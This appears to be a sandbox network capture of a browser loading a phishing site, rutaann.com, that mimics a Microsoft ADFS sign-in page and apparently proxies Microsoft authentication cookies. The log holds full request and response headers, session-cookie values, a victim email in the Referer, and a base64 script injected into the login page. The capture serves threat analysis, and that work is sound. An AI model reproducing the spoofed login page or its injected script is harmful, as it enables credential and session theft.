                                                        Data Ascii: <html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gY3VzdG9tRnVuY3Rpb24oKSB7CiAgICBpZiAoIWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIi5jdXN0b20tY2xhc3MiKSB8fCAhZG9jdW1lbnQucXVlcnlTZWxlY3RvcigiLnJvdGF0ZS1jbGFzcyIpKSB7CiAgICAgICAgdmFyIG5ld0RpdiA9IGRvY3VtZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        33192.168.2.449776103.114.43.73443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:49 UTC1222OUTGET /favicon.ico HTTP/1.1
                                                        Host: rutaann.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://rutaann.com/?qrc=john.smith%40microsoft.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; fpc=Ah-8cUX3klZPh9iRdc8cPP4; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                                        2025-03-25 20:29:49 UTC1727INHTTP/1.1 404 Not Found
                                                        Cache-Control: private
                                                        Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                        x-ms-request-id: 507d20bb-5a36-4645-9fd1-8bd2f4613b00
                                                        x-ms-ests-server: 2.1.20329.5 - WEULR1 ProdSlices
                                                        nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                        x-ms-srs: 1.P
                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                        Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-Dj4gipNEiZPC66EG2Uq7Cw' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                        Date: Tue, 25 Mar 2025 20:29:49 GMT
                                                        Connection: close
                                                        Content-Length: 0
                                                        Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        34192.168.2.449777103.114.43.73443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:49 UTC2941OUTGET /?5cugphbw6=aHR0cHM6Ly9tc2Z0LnN0cy5taWNyb3NvZnQuY29tL2FkZnMvbHMvP2xvZ2luX2hpbnQ9am9obi5zbWl0aCU0MG1pY3Jvc29mdC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZGE5OTZiMmUtNjc1Mi00YmQ2LWFiOGYtYWQ5MGZjNWJhZTY4JnVzZXJuYW1lPWpvaG4uc21pdGglNDBtaWNyb3NvZnQuY29tJndhPXdzaWduaW4xLjAmd3RyZWFsbT11cm4lM2FmZWRlcmF0aW9uJTNhTWljcm9zb2Z0T25saW5lJndjdHg9ZXN0c3JlZGlyZWN0JTNkMiUyNmVzdHNyZXF1ZXN0JTNkclFRSUFSQUE0Mkt3MHNrb0tTa290dExYTDhndktrbk0wY3ZOVEM3S0w4NVBLOG5QeThuTVM5Vkx6c19WeXk5S3owd0JzWXFFdUFUMHNtZmVDa3FfNXIyNmYtMkVQOUhyTWxZeEtoTTJRdjhDSS1NTFJzWkpUQkpaLVJsNWVzVzVtU1VaRG5CMUlCVzNtQVQ5aTlJOVU4S0wzVkpUVW9zU1N6THo4eTZ3Q0x4aTRURmd0dUxnNEJKZ2tHQlFZUGpCd3JpSUZlaUkxd2RfTG4xYzlkdXJzZjhQTzFPZkM4TXBWbjB2VV9PQXN2THlFUGRNUzljQTR4UnZ2Mnh2Ri05RWt4RF9TaU5YbHlxWHBDZ2ZSd196aUh5TGN0TlFXd3Nyd3dsc1FoUFltRTZ4TVh4Z1kteGdaNWpGem5DQWtfRUFMOE1QdnRXblZsemU4X3ZXTzQ4TkFnd1BCQmdBMCM= HTTP/1.1
                                                        Host: rutaann.com
                                                        Connection: keep-alive
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Referer: https://rutaann.com/?qrc=john.smith%40microsoft.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEq [TRUNCATED]
                                                        2025-03-25 20:29:51 UTC849INHTTP/1.1 200 OK
                                                        Cache-Control: no-cache,no-store
                                                        Pragma: no-cache
                                                        content-length: 49216
                                                        Content-Type: text/html; charset=utf-8
                                                        Expires: -1
                                                        Server: Microsoft-HTTPAPI/2.0 Microsoft-HTTPAPI/2.0
                                                        Date: Tue, 25 Mar 2025 20:29:50 GMT
                                                        Connection: close
                                                        Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                        2025-03-25 20:29:51 UTC15535INData Raw: 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 33 56 7a 64 47 39 74 52 6e 56 75 59 33 52 70 62 32 34 6f 4b 53 42 37 43 69 41 67 49 43 42 70 5a 69 41 6f 49 57 52 76 59 33 56 74 5a 57 35 30 4c 6e 46 31 5a 58 4a 35 55 32 56 73 5a 57 4e 30 62 33 49 6f 49 69 35 6a 64 58 4e 30 62 32 30 74 59 32 78 68 63 33 4d 69 4b 53 42 38 66 43 41 68 5a 47 39 6a 64 57 31 6c 62 6e 51 75 63 58 56 6c 63 6e 6c 54 5a 57 78 6c 59 33 52 76 63 69 67 69 4c 6e 4a 76 64 47 46 30 5a 53 31 6a 62 47 46 7a 63 79 49 70 4b 53 42 37
                                                        Data Ascii: <!DOCTYPE html><html lang="en-US"> <head><script src="data:text/javascript;base64,ZnVuY3Rpb24gY3VzdG9tRnVuY3Rpb24oKSB7CiAgICBpZiAoIWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIi5jdXN0b20tY2xhc3MiKSB8fCAhZG9jdW1lbnQucXVlcnlTZWxlY3RvcigiLnJvdGF0ZS1jbGFzcyIpKSB7
                                                        2025-03-25 20:29:51 UTC16384INData Raw: 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 61 69 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 77 6f 72 6b 41 72 65 61 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6f 6b 69 65 50 75 6c 6c 50 61 67 65 22 3e 0d 0a 20 20 20 20 3c 21 2d 2d 20 44 69 73 70 6c 61 79 20 74 68 65 20 6f 72 69 67 69 6e 61 6c 20 74 65 78 74 20 69 66 20 70 61 67 65 20 69 73 20 76 69 65 77 65 64 20 69 6e 20 49 45 39 2d 2c 20 61 73 20 61 6e 69 6d 61 74 69 6f 6e 20 69 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 20 2d 2d 3e 0d 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6f 6b 69 65 50 75 6c 6c 50 61 67 65 54 65 78 74 22 20 63 6c 61 73
                                                        Data Ascii: iv> <main> <div id="workArea"> <div id="cookiePullPage"> ... Display the original text if page is viewed in IE9-, as animation is not supported --> <div id="cookiePullPageText" clas
                                                        2025-03-25 20:29:51 UTC16384INData Raw: 73 68 22 29 20 7c 7c 20 4e 4f 54 5f 53 45 54 5f 43 4f 4e 53 54 3b 0d 0a 20 20 20 20 20 20 20 20 5f 73 65 6c 66 2e 77 61 75 74 68 20 3d 20 5f 73 65 6c 66 2e 67 65 74 51 75 65 72 79 53 74 72 69 6e 67 28 22 77 61 75 74 68 22 29 20 7c 7c 20 4e 4f 54 5f 53 45 54 5f 43 4f 4e 53 54 3b 0d 0a 20 20 20 20 20 20 20 20 5f 73 65 6c 66 2e 64 65 62 75 67 67 69 6e 67 20 3d 20 5f 73 65 6c 66 2e 67 65 74 51 75 65 72 79 53 74 72 69 6e 67 28 22 64 65 62 75 67 22 29 20 7c 7c 20 4e 4f 54 5f 53 45 54 5f 43 4f 4e 53 54 3b 0d 0a 20 20 20 20 20 20 20 20 5f 73 65 6c 66 2e 77 61 75 74 68 20 3d 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 5f 73 65 6c 66 2e 77 61 75 74 68 29 3b 0d 0a 20 20 20 20 20 20 20 20 5f 73 65 6c 66 2e 55 73 65 72 6e 61 6d 65 20 3d 20 4e 4f 54 5f
                                                        Data Ascii: sh") || NOT_SET_CONST; _self.wauth = _self.getQueryString("wauth") || NOT_SET_CONST; _self.debugging = _self.getQueryString("debug") || NOT_SET_CONST; _self.wauth = decodeURIComponent(_self.wauth); _self.Username = NOT_
                                                        2025-03-25 20:29:51 UTC913INData Raw: 65 71 75 65 73 74 49 44 2c 20 55 73 65 72 6e 61 6d 65 3a 20 5f 73 65 6c 66 2e 55 73 65 72 6e 61 6d 65 2c 20 77 61 75 74 68 3a 20 5f 73 65 6c 66 2e 77 61 75 74 68 2c 20 77 66 72 65 73 68 3a 20 5f 73 65 6c 66 2e 77 66 72 65 73 68 2c 20 77 74 72 65 61 6c 6d 3a 20 5f 73 65 6c 66 2e 64 65 63 6f 64 65 64 77 74 72 65 61 6c 6d 2c 20 54 79 70 65 3a 20 5f 73 65 6c 66 2e 61 75 74 68 53 65 6c 65 63 74 69 6f 6e 4c 69 6e 6b 43 6c 69 63 6b 65 64 2c 20 53 65 6c 65 63 74 69 6f 6e 4d 65 74 68 6f 64 3a 20 5f 73 65 6c 66 2e 61 75 74 68 53 65 6c 65 63 74 69 6f 6e 4d 65 74 68 6f 64 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 20 4f 6c 64 42 72 6f 77 73 65 72 4c 61 74 65 6e 63 79 3a 20 61 75 74 68 53 65 6c 65 63 74 69 6f 6e 54 69 6d 65 4f 6c 64 42 72 6f 77
                                                        Data Ascii: equestID, Username: _self.Username, wauth: _self.wauth, wfresh: _self.wfresh, wtrealm: _self.decodedwtrealm, Type: _self.authSelectionLinkClicked, SelectionMethod: _self.authSelectionMethod }, { OldBrowserLatency: authSelectionTimeOldBrow


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        35192.168.2.449779103.114.43.73443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:51 UTC2852OUTGET /adfs/portal/css/style.css?id=662A3B02F40F2A4B3BB97889A3E6C681EFB452728D8E77E0F97203AE5C53057E HTTP/1.1
                                                        Host: rutaann.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://rutaann.com/?5cugphbw6=aHR0cHM6Ly9tc2Z0LnN0cy5taWNyb3NvZnQuY29tL2FkZnMvbHMvP2xvZ2luX2hpbnQ9am9obi5zbWl0aCU0MG1pY3Jvc29mdC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZGE5OTZiMmUtNjc1Mi00YmQ2LWFiOGYtYWQ5MGZjNWJhZTY4JnVzZXJuYW1lPWpvaG4uc21pdGglNDBtaWNyb3NvZnQuY29tJndhPXdzaWduaW4xLjAmd3RyZWFsbT11cm4lM2FmZWRlcmF0aW9uJTNhTWljcm9zb2Z0T25saW5lJndjdHg9ZXN0c3JlZGlyZWN0JTNkMiUyNmVzdHNyZXF1ZXN0JTNkclFRSUFSQUE0Mkt3MHNrb0tTa290dExYTDhndktrbk0wY3ZOVEM3S0w4NVBLOG5QeThuTVM5Vkx6c19WeXk5S3owd0JzWXFFdUFUMHNtZmVDa3FfNXIyNmYtMkVQOUhyTWxZeEtoTTJRdjhDSS1NTFJzWkpUQkpaLVJsNWVzVzVtU1VaRG5CMUlCVzNtQVQ5aTlJOVU4S0wzVkpUVW9zU1N6THo4eTZ3Q0x4aTRURmd0dUxnNEJKZ2tHQlFZUGpCd3JpSUZlaUkxd2RfTG4xYzlkdXJzZjhQTzFPZkM4TXBWbjB2VV9PQXN2THlFUGRNUzljQTR4UnZ2Mnh2Ri05RWt4RF9TaU5YbHlxWHBDZ2ZSd196aUh5TGN0TlFXd3Nyd3dsc1FoUFltRTZ4TVh4Z1kteGdaNWpGem5DQWtfRUFMOE1QdnRXblZsemU4X3ZXTzQ4TkFnd1BCQmdBMCM=
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEq [TRUNCATED]
                                                        2025-03-25 20:29:52 UTC287INHTTP/1.1 200 OK
                                                        Content-Length: 31246
                                                        Content-Type: text/css
                                                        Expires: Thu, 24 Apr 2025 20:29:52 GMT
                                                        ETag: 662A3B02F40F2A4B3BB97889A3E6C681EFB452728D8E77E0F97203AE5C53057E
                                                        Server: Microsoft-HTTPAPI/2.0 Microsoft-HTTPAPI/2.0
                                                        Date: Tue, 25 Mar 2025 20:29:52 GMT
                                                        Connection: close
                                                        2025-03-25 20:29:52 UTC16097INData Raw: ef bb bf 2a 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 7d 0d 0a 0d 0a 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 53 65 67 6f 65 20 55 49 20 57 65 62 66 6f 6e 74 22 2c 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 22 4c 75 63 69 64 61 20
                                                        Data Ascii: * { margin: 0px; padding: 0px;}html, body { height: 100%; width: 100%; background-color: #ffffff; color: #000000; font-weight: normal; font-family: "Segoe UI Webfont",-apple-system,"Helvetica Neue","Lucida
                                                        2025-03-25 20:29:52 UTC15149INData Raw: 3a 20 66 6c 65 78 2d 73 74 61 72 74 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 30 2c 20 31 30 33 2c 20 31 38 34 29 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 30 2c 20 31 30 33 2c 20 31 38 34 29 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 77 69 64 74 68 3a 20 31 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 69 6d 61 67 65 2d 6f 75 74 73 65 74 3a 20 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 69 6d 61 67 65 2d 72 65 70 65 61 74 3a 20 73 74 72 65 74 63 68 3b 0d 0a 20
                                                        Data Ascii: : flex-start; background-color: rgb(0, 103, 184); border-bottom-color: rgb(0, 103, 184); border-bottom-style: solid; border-bottom-width: 1px; border-image-outset: 0px; border-image-repeat: stretch;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        36192.168.2.449778103.114.43.73443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:51 UTC2898OUTGET /adfs/portal/logo/logo.png?id=112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960 HTTP/1.1
                                                        Host: rutaann.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://rutaann.com/?5cugphbw6=aHR0cHM6Ly9tc2Z0LnN0cy5taWNyb3NvZnQuY29tL2FkZnMvbHMvP2xvZ2luX2hpbnQ9am9obi5zbWl0aCU0MG1pY3Jvc29mdC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZGE5OTZiMmUtNjc1Mi00YmQ2LWFiOGYtYWQ5MGZjNWJhZTY4JnVzZXJuYW1lPWpvaG4uc21pdGglNDBtaWNyb3NvZnQuY29tJndhPXdzaWduaW4xLjAmd3RyZWFsbT11cm4lM2FmZWRlcmF0aW9uJTNhTWljcm9zb2Z0T25saW5lJndjdHg9ZXN0c3JlZGlyZWN0JTNkMiUyNmVzdHNyZXF1ZXN0JTNkclFRSUFSQUE0Mkt3MHNrb0tTa290dExYTDhndktrbk0wY3ZOVEM3S0w4NVBLOG5QeThuTVM5Vkx6c19WeXk5S3owd0JzWXFFdUFUMHNtZmVDa3FfNXIyNmYtMkVQOUhyTWxZeEtoTTJRdjhDSS1NTFJzWkpUQkpaLVJsNWVzVzVtU1VaRG5CMUlCVzNtQVQ5aTlJOVU4S0wzVkpUVW9zU1N6THo4eTZ3Q0x4aTRURmd0dUxnNEJKZ2tHQlFZUGpCd3JpSUZlaUkxd2RfTG4xYzlkdXJzZjhQTzFPZkM4TXBWbjB2VV9PQXN2THlFUGRNUzljQTR4UnZ2Mnh2Ri05RWt4RF9TaU5YbHlxWHBDZ2ZSd196aUh5TGN0TlFXd3Nyd3dsc1FoUFltRTZ4TVh4Z1kteGdaNWpGem5DQWtfRUFMOE1QdnRXblZsemU4X3ZXTzQ4TkFnd1BCQmdBMCM=
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEq [TRUNCATED]
                                                        2025-03-25 20:29:52 UTC287INHTTP/1.1 200 OK
                                                        Content-Length: 4054
                                                        Content-Type: image/png
                                                        Expires: Thu, 24 Apr 2025 20:29:52 GMT
                                                        ETag: 112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                        Server: Microsoft-HTTPAPI/2.0 Microsoft-HTTPAPI/2.0
                                                        Date: Tue, 25 Mar 2025 20:29:52 GMT
                                                        Connection: close
